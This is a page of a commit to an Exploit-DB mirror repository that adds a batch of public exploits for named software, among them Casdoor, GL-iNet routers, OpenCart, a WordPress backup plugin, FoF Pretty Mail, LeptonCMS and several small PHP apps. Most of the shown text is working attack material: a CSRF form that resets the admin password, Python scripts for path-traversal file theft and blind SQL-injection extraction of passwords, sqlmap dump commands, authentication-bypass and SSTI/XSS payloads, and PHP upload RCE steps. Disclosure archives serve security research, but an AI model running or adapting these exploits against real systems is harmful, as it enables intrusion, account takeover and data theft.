bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2024-04-03

Browse source 
28 changes to exploits/shellcodes/ghdb

Casdoor < v1.331.0 - '/api/set-password' CSRF

GL-iNet MT6000 4.5.5 - Arbitrary File Download

Axigen < 10.5.7 - Persistent Cross-Site Scripting

Blood Bank v1.0 - Stored Cross Site Scripting (XSS)

CE Phoenix v1.0.8.20 - Remote Code Execution
Daily Habit Tracker 1.0 - Broken Access Control
Daily Habit Tracker 1.0 - SQL Injection
Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)

E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)

Elementor Website Builder < 3.12.2 - Admin+ SQLi
Employee Management System 1.0 - _txtfullname_ and _txtphone_ SQL Injection
Employee Management System 1.0 - _txtusername_ and _txtpassword_ SQL Injection (Admin Login)
FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI)
FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI)

Gibbon LMS v26.0.00 - SSTI vulnerability

Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)

LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)

Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)

OpenCart Core 4.0.2.3 - 'search' SQLi

Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)

Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal

Smart School 6.4.1 - SQL Injection

Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)

ASUS Control Center Express 01.06.15 - Unquoted Service Path

Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation

Microsoft Windows Defender - Detection Mitigation Bypass TrojanWin32Powessere.G

Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path
This commit is contained in:
Exploit-DB 2024-04-03 00:16:27 +00:00
parent e791587e41
commit a44e138f78
28 changed files with 1601 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

39
exploits/go/webapps/51961.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF
# Application: Casdoor
# Version: <= 1.331.0
# Date: 03/07/2024
# Exploit Author: Van Lam Nguyen
# Vendor Homepage: https://casdoor.org/
# Software Link: https://github.com/casdoor/casdoor
# Tested on: Windows
# CVE : CVE-2023-34927
Overview
==================================================
Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.
This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.
Proof of Concept
==================================================
Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
<html>
<form action="http://localhost:8000/api/set-password" method="POST">
<input name='userOwner' value='built&#45;in' type='hidden'>
<input name='userName' value='admin' type='hidden'>
<input name='newPassword' value='hacked' type='hidden'>
<input type=submit>
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</html>
If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials
userOwner: built&#45;in
userName: admin
newPassword: hacked

79
exploits/hardware/remote/51942.py Executable file
View file

@ -0,0 +1,79 @@
# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download
# CVE: CVE-2024-27356
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: 2/26/2024
# Exploit Author: Bandar Alharbi (aggressor)
# Vendor Homepage: www.gl-inet.com
# Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin
# Tested Model: GL-X3000 Spitz AX
# Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md
import sys
import requests
import json
requests.packages.urllib3.disable_warnings()
h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}
def DoesTarExist():
r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)
if r.status_code == 200:
f = open("logread.tar", "wb")
f.write(r.content)
f.close()
print("[*] Full logs archive `logread.tar` has been downloaded!")
print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")
return True
else:
print("[*] The `logread.tar` archive does not exist however ... try again later!")
return False
def isVulnerable():
r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)
if r1.status_code == 500 and "nginx" in r1.text:
r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)
if "Admin-Token" in r2.text:
j = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}
r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)
ver = r3.json()['result']['firmware_version']
model = r3.json()['result']['model']
if ver.startswith(('4.')):
print("[*] Firmware version (%s) is vulnerable!" %ver)
print("[*] Device model is: %s" %model)
return True
print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")
return False
def isAlive():
try:
r = requests.get(url, verify=False, timeout=30, headers=h)
if r.status_code != 200:
print("[*] Make sure the target's web interface is accessible!")
return False
elif r.status_code == 200:
print("[*] The target is reachable!")
return True
except Exception:
print("[*] Error occurred when connecting to the target!")
pass
return False
if __name__ == '__main__':
if len(sys.argv) != 2:
print("exploit.py url")
sys.exit(0)
url = sys.argv[1]
url = url.lower()
if not url.startswith(('http://', 'https://')):
print("[*] Invalid url format! It should be http[s]://<domain or ip>")
sys.exit(0)
if url.endswith("/"):
url = url.rstrip("/")
print("[*] GL.iNet Unauthenticated Full Logs Downloader")
try:
if (isAlive() and isVulnerable()) == (True and True):
DoesTarExist()
except KeyboardInterrupt:
print("[*] The exploit has been stopped by the user!")
sys.exit(0)

49
exploits/php/webapps/51937.txt Normal file
View file

@ -0,0 +1,49 @@
# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal
# Date: 2024-03-06
# Exploit Author: Ven3xy
# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.10
# Tested on: Linux
import sys
import requests
from urllib.parse import urljoin
import time
def exploit(target_url, file_name, depth):
traversal = '../' * depth
exploit_url = urljoin(target_url, '/wp-admin/tools.php')
params = {
'page': 'backup_manager',
'download_backup_file': f'{traversal}{file_name}'
}
response = requests.get(exploit_url, params=params)
if response.status_code == 200 and response.headers.get('Content-Disposition') \
and 'attachment; filename' in response.headers['Content-Disposition'] \
and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:
print(response.text) # Replace with the desired action for the downloaded content
file_path = f'simplebackup_{file_name}'
with open(file_path, 'wb') as file:
file.write(response.content)
print(f'File saved in: {file_path}')
else:
print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Usage: python exploit.py <target_url> <file_name> <depth>")
sys.exit(1)
target_url = sys.argv[1]
file_name = sys.argv[2]
depth = int(sys.argv[3])
print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n")
time.sleep(5)
exploit(target_url, file_name, depth)

83
exploits/php/webapps/51938.py Executable file
View file

@ -0,0 +1,83 @@
# Exploit Title: Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)
# Google Dork: n/a
# Date: 04/02/2024
# Exploit Author: Gian Paris C. Agsam
# Vendor Homepage: https://github.com/projectworldsofficial
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip
# Version: 1.0
# Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12
# CVE : n/a
import requests
import argparse
from colorama import (Fore as F, Back as B, Style as S)
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITE
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection')
parser.add_argument('-u', '--url', help='')
args = parser.parse_args()
def banner():
print(f"""{FR}
··. · . · · ·
·· . .· ·
· ··
.... ..
· .
Github: https://github.com/offensive-droid
{FW}
""")
# Define the characters to test
chars = [
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D',
'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S',
'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7',
'8', '9', '@', '#'
]
def sqliPayload(char, position, userid, column, table):
sqli = 'admin\' UNION SELECT IF(SUBSTRING('
sqli += str(column) + ','
sqli += str(position) + ',1) = \''
sqli += str(char) + '\',sleep(3),null) FROM '
sqli += str(table) + ' WHERE uname="admin"\''
return sqli
def postRequest(URL, sqliReq, char, position):
sqliURL = URL
params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"}
req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10)
if req.elapsed.total_seconds() >= 2:
print("{} : {}".format(char, req.elapsed.total_seconds()))
return char
return ''
def theHarvester(target, CHARS, url):
#print("Retrieving: {} {} {}".format(target['table'], target['column'], target['id']))
print("Retrieving admin password".format(target['table'], target['column'], target['id']))
position = 1
full_pass = ""
while position < 5:
for char in CHARS:
sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table'])
found_char = postRequest(url, sqliReq, char, position)
full_pass += found_char
position += 1
return full_pass
if __name__ == "__main__":
banner()
HOST = str(args.url)
PATH = HOST + "/hotel booking/admin/login.php"
adminPassword = {"id": "1", "table": "manager", "column": "upass"}
adminPass = theHarvester(adminPassword, chars, PATH)
print("Admin Password:", adminPass)

23
exploits/php/webapps/51940.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi
# Date: 2024-04-2
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://github.com/opencart/opencart/releases
# Version: 4.0.2.3
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz
* Description :
Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
* Steps to Reproduce :
- Go to : http://127.0.0.1/index.php?route=product/search&search=test
- New Use command Sqlmap : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs
===========
Output :
Parameter: search (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/search&search=') AND 2427=2427-- drCa
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb

18
exploits/php/webapps/51943.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)
# Date: 02/04/2024
# Exploit Author: Sandeep Vishwakarma
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: v1.0
# Tested on: Windows 10
# Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component.
# POC:
1. Here we go to : http://127.0.0.1/fuelflow/index.php
2. Now login with default username=mayuri.infospace@gmail.com and Password=admin
3. Now go to "http://127.0.0.1/fuelflow/admin/web.php"
4. Upload the san.php file in "Image" field
5. Phpinfo will be present in "http://localhost/fuelflow/assets/images/phpinfo.php" page
6. The content of san.php file is given below: <?php phpinfo();?>
# Reference:
https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29410.md

20
exploits/php/webapps/51944.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)
# Google Dork: NA
# Date: 28-03-2024
# Exploit Author: Sandeep Vishwakarma
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
# Version: v1.0
# Tested on: Windows 10
# Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE -
v1.0 allows an attacker to execute arbitrary code via a crafted payload to
the Firstname and lastname parameter in the profile component.
# POC:
1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile
2. In fname & lname parameter add payolad
"><script>alert("Hacked_by_Sandy")</script>
3. click on submit.
# Reference:
https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md

26
exploits/php/webapps/51945.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)
# Google Dork: NA
# Date: 28-03-2024
# Exploit Author: Sandeep Vishwakarma
# Vendor Homepage: https://code-projects.org
# Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/
# Version: v1.0
# Tested on: Windows 10
# CVE : CVE-2024-29412
# Description: Stored Cross Site Scripting vulnerability in
Hospital Management System - v1.0 allows an attacker to execute arbitrary
code via a crafted payload to the 'patient_id',
'first_name','middle_initial' ,'last_name'" in /receptionist.php component.
# POC:
1. Go to the User Login page: "
http://localhost/HospitalManagementSystem-gh-pages/
2. Login with "r1" ID which is redirected to "
http://localhost/HospitalManagementSystem-gh-pages/receptionist.php"
endpoint.
3. In Patient information functionality add this payload
"><script>alert('1')</script> ,in all parameter.
4. click on submit.
# Reference:
https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29412.md

27
exploits/php/webapps/51947.txt Normal file
View file

@ -0,0 +1,27 @@
Exploit Title: FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI)
Date: 03/28/2024
Exploit Author: Chokri Hammedi
Vendor Homepage: https://flarum.org/
Software Link: https://github.com/FriendsOfFlarum/pretty-mail
Version: 1.1.2
Tested on: Windows XP
CVE: N/A
Description:
The FoF Pretty Mail extension for Flarum is vulnerable to Local File Inclusion (LFI) due to the unsafe handling of file paths in the email template. An attacker with administrative access can exploit this vulnerability to include sensitive files from the server's file system in the email content, potentially leading to information disclosure.
Steps to Reproduce:
Log in as an administrator on the Flarum forum.
Navigate to the FoF Pretty Mail extension settings.
Edit the email default template and insert the following payload at the end of the template:
{{ include('/etc/passwd') }}
Save the changes to the email template.
Trigger any action that sends an email, such as user registration or password reset.
The recipient of the email will see the contents of the included file (in this case, /etc/passwd) in the email content.

28
exploits/php/webapps/51948.txt Normal file
View file

@ -0,0 +1,28 @@
Exploit Title: FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI)
Date: 03/28/2024
Exploit Author: Chokri Hammedi
Vendor Homepage: https://flarum.org/
Software Link: https://github.com/FriendsOfFlarum/pretty-mail
Version: 1.1.2
Tested on: Windows XP
CVE: N/A
Description:
The FoF Pretty Mail extension for Flarum is vulnerable to Server-Side
Template Injection (SSTI) due to the unsafe handling of template variables.
An attacker with administrative access can inject malicious code into the
email template, leading to arbitrary code execution on the server.
Steps to Reproduce:
- Log in as an administrator on the Flarum forum.
- Navigate to the FoF Pretty Mail extension settings.
- Edit the email default template and insert the following payload:
{{ 7*7 }}
{{ system('id') }}
{{ system('echo "Take The Rose"') }}
- Save the changes to the email template.
- Trigger any action that sends an email, such as user registration or password reset.
- The recipient of the email will see the result of the injected expressions (e.g., "49" for {{ 7*7 }}, the output of the id command for {{ system('id') }}, and the output of the echo "Take The Rose" command for {{ system('echo"Take The Rose"') }}) in the email content.

13
exploits/php/webapps/51949.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 2024-1-19
# Exploit Author: tmrswrr
# Category: Webapps
# Vendor Homepage: https://www.lepton-cms.com/
# Version : 7.0.0
1 ) Login with admin cred > https://127.0.0.1/LEPTON/backend/login/index.php
2 ) Go to Languages place > https://127.0.0.1/LEPTON/backend/languages/index.php
3 ) Upload upgrade.php file in languages place > <?php echo system('id'); ?>
4 ) After click install you will be see result
# Result : uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)

65
exploits/php/webapps/51950.md Normal file
View file

@ -0,0 +1,65 @@
# Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24499
### SQL Injection:
> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.
### Affected Components:
> /employee_akpoly/Admin/edit_profile.php
> Two parameters `txtfullname` and `txtphone` within admin edit profile mechanism are vulnerable to SQL Injection.
![txtfullname](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtfullname_sqli.png?raw=true)
![txtphone](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtphone_sqli.png?raw=true)
### Description:
> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.
## Proof of Concept:
### SQLMap
Save the following request to `edit_profile.txt`:
```
POST /employee_akpoly/Admin/edit_profile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_akpoly/Admin/edit_profile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
txtfullname=Caroline+Bassey&txtphone=0905656&old_image=uploadImage%2Fbird.jpg&btnupdate=
```
Use `sqlmap` with `-r` option to exploit the vulnerability:
```
sqlmap -r edit_profile.txt --level 5 --risk 3 --batch --dbms MYSQL --dump
```
## Recommendations
When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

88
exploits/php/webapps/51951.md Normal file
View file

@ -0,0 +1,88 @@
# Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login)
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24497
### SQL Injection:
> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.
### Affected Components:
> /employee_akpoly/Admin/login.php
> Two parameters `txtusername` and `txtpassword` within admin login mechanism are vulnerable to SQL Injection.
![txtusername](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtusername_sqli.png?raw=true)
![txtpassword](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtpassword_sqli.png?raw=true)
### Description:
> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.
## Proof of Concept:
### Manual Exploitation
The payload `' and 1=1-- -` can be used to bypass authentication within admin login page.
```
POST /employee_akpoly/Admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_akpoly/Admin/login.php
Cookie: PHPSESSID=lcb84k6drd2tepn90ehe7p9n20
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
txtusername=admin' and 1=1-- -&txtpassword=password&btnlogin=
```
### SQLMap
Save the following request to `admin_login.txt`:
```
POST /employee_akpoly/Admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_akpoly/Admin/login.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
txtusername=admin&txtpassword=password&btnlogin=
```
Use `sqlmap` with `-r` option to exploit the vulnerability:
```
sqlmap -r admin_login.txt --level 5 --risk 3 --batch --dbms MYSQL --dump
```
## Recommendations
When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

64
exploits/php/webapps/51952.md Normal file
View file

@ -0,0 +1,64 @@
# Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24494
### Stored Cross-Site Scripting (XSS):
> Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security.
### Affected Components:
> add-tracker.php, update-tracker.php
Vulnerable parameters:
- day
- exercise
- pray
- read_book
- vitamins
- laundry
- alcohol
- meat
### Description:
> Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page.
## Proof of Concept:
The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability.
Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value:
```
POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 175
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
```
![XSS Fired](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/xss.png?raw=true)
## Recommendations
When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

74
exploits/php/webapps/51953.md Normal file
View file

@ -0,0 +1,74 @@
# Exploit Title: Daily Habit Tracker 1.0 - SQL Injection
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24495
### SQL Injection:
> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.
### Affected Components:
> delete-tracker.php
### Description:
> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.
## Proof of Concept:
### Manual Exploitation
The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:
```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```
![5 seconds delay](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/sqli.png?raw=true)
### SQLMap
Save the following request to `delete_tracker.txt`:
```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```
Use `sqlmap` with `-r` option to exploit the vulnerability:
```
sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump
```
## Recommendations
When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

103
exploits/php/webapps/51954.md Normal file
View file

@ -0,0 +1,103 @@
# Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24496
### Broken Access Control:
> Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them.
### Affected Components:
> home.php, add-tracker.php, delete-tracker.php, update-tracker.php
### Description:
> Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials.
## Proof of Concept:
### Unauthenticated Access to Home page
> To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page.
### Create Tracker as Unauthenticated User
To create a tracker, use the following request:
```
POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
```
### Update Tracker as Unauthenticated User
To update a tracker, use the following request:
```
POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes
```
### Delete Tracker as Unauthenticated User:
To delete a tracker, use the following request:
```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
Host: localhost
